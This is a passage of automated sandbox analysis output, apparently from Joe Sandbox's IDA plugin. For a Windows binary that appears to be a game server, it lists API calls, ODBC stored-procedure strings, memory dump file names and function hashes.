                                                                                      • Instruction Fuzzy Hash: E041EEB1A00508ABDB24DBAACD51FAEB375EF44B14F30831CF6516B3C6D675A9108F54
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(004E92C8,40000000,00000001,00000000,00000002,80000080,00000000), ref: 0045E0CD
                                                                                      • GetCurrentThread.KERNEL32 ref: 0045E0E0
                                                                                      • SetThreadPriority.KERNEL32(00000000), ref: 0045E0E7
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0045E0F3
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,?,00000000,00000000), ref: 0045E126
                                                                                      • GetCurrentProcess.KERNEL32(00000000), ref: 0045E12D
                                                                                      • GetCurrentThread.KERNEL32 ref: 0045E13B
                                                                                      • SetThreadPriority.KERNEL32(00000000), ref: 0045E142
                                                                                      • CloseHandle.KERNEL32(?), ref: 0045E14C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentThread$PriorityProcess$CloseCreateFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2365548949-0
                                                                                      • Opcode ID: 932f8cab8e90ebe498c929936efee78857bdea7393c46558202f7dcc5a6f6357
                                                                                      • Instruction ID: a78f1421e3e38e58bb1954b567a954230ba9de0356a748b699f0323ae7372cc5
                                                                                      • Opcode Fuzzy Hash: 932f8cab8e90ebe498c929936efee78857bdea7393c46558202f7dcc5a6f6357
                                                                                      • Instruction Fuzzy Hash: A6115170940305ABDB549FE0DC0DFAE7738BB05706F104529FA11A62E2C7B55504CB9D
                                                                                      APIs
                                                                                      • __allrem.LIBCMT ref: 00480243
                                                                                      • __allrem.LIBCMT ref: 0048025B
                                                                                      • __allrem.LIBCMT ref: 00480277
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004802B2
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004802CE
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004802E5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                      • String ID: E
                                                                                      • API String ID: 1992179935-3568589458
                                                                                      • Opcode ID: 177a3d48b4849bab5ca766b3295bc10203d4e02127d1cb146e6d29ea2be67334
                                                                                      • Instruction ID: 8f4c7ae365256408027f86a367d6081ededdce4ba65a0f7905e9006932448451
                                                                                      • Opcode Fuzzy Hash: 177a3d48b4849bab5ca766b3295bc10203d4e02127d1cb146e6d29ea2be67334
                                                                                      • Instruction Fuzzy Hash: 7771B271E10208BFDB54EFA9CC81B9EB7B5FB44724F14896BE914E3281D7B89E448B44
                                                                                      APIs
                                                                                        • Part of subcall function 0045E040: wvsprintfA.USER32(?,?,?), ref: 0045E068
                                                                                        • Part of subcall function 0045E040: lstrlenA.KERNEL32(?,?,00000000), ref: 0045E082
                                                                                        • Part of subcall function 0045E040: WriteFile.KERNEL32(?,?,00000000), ref: 0045E094
                                                                                        • Part of subcall function 0045E5E0: wsprintfA.USER32 ref: 0045E695
                                                                                        • Part of subcall function 0045E5E0: wsprintfA.USER32 ref: 0045E6B6
                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0045EACA
                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0045EAE7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Filewsprintf$ModuleNameQueryVirtualWritelstrlenwvsprintf
                                                                                      • String ID: %08x %08x %s$%02x $Bytes at CS:EIP: $Intel Call Stack Information:
                                                                                      • API String ID: 2859151253-322265786
                                                                                      • Opcode ID: ee86962e6182c828da682a2cc9aaf000090cc9421260cf381f4ffb1b6597b37f
                                                                                      • Instruction ID: ff346007aee75027d5b9dc272e1c703478d08b92d50f12a833ef869daa5ad782
                                                                                      • Opcode Fuzzy Hash: ee86962e6182c828da682a2cc9aaf000090cc9421260cf381f4ffb1b6597b37f
                                                                                      • Instruction Fuzzy Hash: 57518375A00218DBCB04DF95DC45FEEB7B5FB48705F14419EE809A7382D738AA44CB59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InsertCharTitle] (?, ?, ?, ?)},000000FD), ref: 0043A2A2
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043A2EB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043A320
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043A358
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043A395
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 0043A3CD
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InsertCharTitle] (?, ?, ?, ?)}, xrefs: 0043A299
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InsertCharTitle] (?, ?, ?, ?)}
                                                                                      • API String ID: 0-3752106691
                                                                                      • Opcode ID: 16798bd745c41aad510da4f48925c7fa2fae79b081cfa7114f4dfec480cb1e8b
                                                                                      • Instruction ID: 65c30414548142fe5f6dd09c4f061e50344557bd8b6b9f469ad7eeecab27b176
                                                                                      • Opcode Fuzzy Hash: 16798bd745c41aad510da4f48925c7fa2fae79b081cfa7114f4dfec480cb1e8b
                                                                                      • Instruction Fuzzy Hash: 8A4141B0A50254ABEB209F44CC66FA97775EB85B14F108689F6187F2C1D6F26F40CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InsertCharQuest5] (?, ?, ?, ?)},000000FD), ref: 0042EA03
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042EA4C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042EA81
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042EAB9
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042EAF6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 0042EB2E
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InsertCharQuest5] (?, ?, ?, ?)}, xrefs: 0042E9FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InsertCharQuest5] (?, ?, ?, ?)}
                                                                                      • API String ID: 0-4236819626
                                                                                      • Opcode ID: 60a87621a233cdab8df7517620f6e7b04f963622e0394ed372db7206b87a55fc
                                                                                      • Instruction ID: 4e12b858c0486f3dbc605c4a07845be894b20a537aa2aa9c74f3b765863148a1
                                                                                      • Opcode Fuzzy Hash: 60a87621a233cdab8df7517620f6e7b04f963622e0394ed372db7206b87a55fc
                                                                                      • Instruction Fuzzy Hash: 2B4103B06412186BEB248F44CC52FD97376EBC4718F148189F7186F2C5D5B26E918F9C
                                                                                      APIs
                                                                                      • #19.ODBC32(?, { ? = CALL [ROHAN_UpdIndunRestrictInfo] (?, ?, ?, ?)},000000FD), ref: 0043B24D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043B28F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043B2C4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043B2FC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E6,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043B334
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E6,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E6,000000FA,00000000), ref: 0043B36C
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_UpdIndunRestrictInfo] (?, ?, ?, ?)}, xrefs: 0043B244
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_UpdIndunRestrictInfo] (?, ?, ?, ?)}
                                                                                      • API String ID: 0-416862037
                                                                                      • Opcode ID: ccd2bdf5143800c99b1602e676de3ed588ce55e13265825cc08af89a81ba5e1d
                                                                                      • Instruction ID: de5aae1a2524d35192739844a919c3d7e57cfebde0de732229e05ef6440f5e36
                                                                                      • Opcode Fuzzy Hash: ccd2bdf5143800c99b1602e676de3ed588ce55e13265825cc08af89a81ba5e1d
                                                                                      • Instruction Fuzzy Hash: 18411EB1A45258ABFB24DF44CC52FA97335FB84B18F244688F6197A2C0D6F369818B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [Rohan_InsTElementalWeaponInfo] (?,?,?,?)},000000FD), ref: 00441064
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004410B0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004410E5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0044111D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00441155
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 0044118D
                                                                                      Strings
                                                                                      • {? = CALL [Rohan_InsTElementalWeaponInfo] (?,?,?,?)}, xrefs: 0044105B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
